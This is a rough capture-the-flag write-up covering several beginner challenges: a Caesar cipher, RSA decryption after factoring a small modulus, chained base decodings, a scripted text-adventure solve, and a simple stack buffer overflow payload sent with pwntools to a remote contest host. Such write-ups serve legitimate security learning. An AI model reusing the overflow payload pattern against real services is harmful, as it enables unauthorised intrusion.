I was given this string and told something about scissors.
egddagzp_ftue_rxms_iuft_rxms_radymf
Solution
Given some code and I just plug it in and run it. At this point, I see two paths. One I program a hardcode for all possibilities. The second option, keep running the program until it works. I decided on the second one because I got lucky the third time I ran it. I included the code I wrote when the contest was over
Yes finally, an RSA puzzle, and I learned how to do it.
So I notice we are missing P and Q so I used the RSActfTool to find those with N and e. Well that was a bust and so I moved onto mesieve
./msieve -q 228430203128652625114739053365339856393
This worked and all I had to do after that was plug the numbers into the code and bam.
Flag: flag{68ab82df34}
Round the Bases [107 pts]
Description
author: AdnanSlef
My flag has been all around the bases. Can you help me get it back?
I know this one was going to use a lot of different base conversions, hence the name so I just launched up CyberChef and got to work. I tried some magic but that had no effect so I just brute forced and tried combinations of base conversions.
Out of all the base__ conversions, base85 gave a magic symbol afterward... I think we are onto something. I just clicked through that and the algorithm created itself.
From Base85 -> From Hex -> From Decimal -> From Octal -> From Binary
So I started with strings bread and that gave me a whole lot, which I exported to a file out.txt and removed the useless information. I then thought that we are trying to find input and some phrases are for sure a response so I removed those as well. Given the last little amount, I was confident it would just take a little bit of time to find the right order. I decided to do some brute force with my code looking something like this after a small start
Once I found everything I created a final Full send
# run_level(level_1, 5)
# initial => target
# run_level(level_2, 10)
# hello => goodbye
# ginkoid => party
# run_level(level_3, 10)
# aa => a
import random
key = random.randint(0, 25)
alphabet = 'abcdefghijklmnopqrstuvwxyz'
shifted = alphabet[key:] + alphabet[:key]
dictionary = dict(zip(alphabet, shifted))
print(''.join([
dictionary[c]
if c in dictionary
else c
for c in input()
]))
for key in range(0,25):
alphabet = 'abcdefghijklmnopqrstuvwxyz'
shifted = alphabet[key:] + alphabet[:key]
dictionary = dict(zip(alphabet, shifted))
print(str(key)+ " " + ''.join([dictionary[c]
if c in dictionary
else c
for c in "egddagzp_ftue_rxms_iuft_rxms_radymf"
]))
from math import gcd
from Crypto.Util.number import *
n = 228430203128652625114739053365339856393
e = 65537
c = 126721104148692049427127809839057445790
p = 12546190522253739887
q = 18207136478875858439
def lcm(x, y):
return (x * y) // gcd(x, y)
def ex_euclid(x, y):
a0, a1 = 1, 0
b0, b1 = 0, 1
c0, c1 = x, y
while c1 != 0:
m = c0 % c1
q = c0 // c1
c0, c1 = c1, m
a0, a1 = a1, (a0 - q * a1)
b0, b1 = b1, (b0 - q * b1)
return a0, b0
t = lcm(p - 1, q - 1)
a, b = ex_euclid(e, t)
d = a % t
m = pow(c, d, n)
print(long_to_bytes(m))
from pwn import *
def fullSend(p):
p.sendlineafter("to the bowl", "add flour")
p.sendlineafter("has been added", "add yeast")
p.sendlineafter("has been added", "add salt")
p.sendlineafter("has been added", "add water")
p.sendlineafter("a lumpy dough", "hide the bowl inside a box")
p.sendlineafter("needs to rise", "wait 3 hours")
p.sendlineafter("finish the dough", "work in the basement")
p.sendlineafter("needs to be baked", "preheat the toaster oven")
p.sendlineafter("for 45 minutes", "set a timer on your phone")
p.sendlineafter("awfully long time", "watch the bread bake")
p.sendlineafter("no time to waste", "pull the tray out with a towel")
p.sendlineafter("smoke in the air", "unplug the fire alarm")
p.sendlineafter("in another room", "open the window")
p.sendlineafter("air rushes in", "unplug the oven")
p.sendlineafter("kitchen is a mess", "wash the sink")
p.sendlineafter("sink is cleaned", "clean the counters")
p.sendlineafter("counters are cleaned", "flush the bread down the toilet")
p.sendlineafter("is disposed of", "get ready to sleep")
p.sendlineafter("go to sleep", "close the window")
p.sendlineafter("window is closed", "replace the fire alarm")
p.sendlineafter("alarm is replaced", "brush teeth and go to bed")
p.interactive()
p.close()
binary = remote("mc.ax", 31796)
fullSend(binary)
from pwn import *
flag_address = 0xffffffffffffffff
payload = b"A" * 40
# binary = process("./beginner-generic-pwn-number-0")
binary = remote("mc.ax", 31199)
print(binary.recvuntil(":(\n"))
binary.sendline(payload + p64(flag_address))
binary.interactive()
# Normal Response
# b'"\xf0\x9d\x98\xb1\xf0\x9d\x98\xad\xf0\x9d\x98\xa6\xf0\x9d\x98\xa2\xf0\x9d\x98\xb4\xf0\x9d\x98\xa6 \xf0\x9d\x98\xb8\xf0\x9d\x98\xb3\xf0\x9d\x98\xaa\xf0\x9d\x98\xb5\xf0\x9d\x98\xa6 \xf0\x9d\x98\xa2 \xf0\x9d\x98\xb1\xf0\x9d\x98\xb8\xf0\x9d\x98\xaf \xf0\x9d\x98\xb4\xf0\x9d\x98\xb0\xf0\x9d\x98\xae\xf0\x9d\x98\xa6\xf0\x9d\x98\xb5\xf0\x9d\x98\xaa\xf0\x9d\x98\xae\xf0\x9d\x98\xa6 \xf0\x9d\x98\xb5\xf0\x9d\x98\xa9\xf0\x9d\x98\xaa\xf0\x9d\x98\xb4 \xf0\x9d\x98\xb8\xf0\x9d\x98\xa6\xf0\x9d\x98\xa6\xf0\x9d\x98\xac"\nrob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!\ncan you write me a heartfelt message to cheer me up? :(\n'
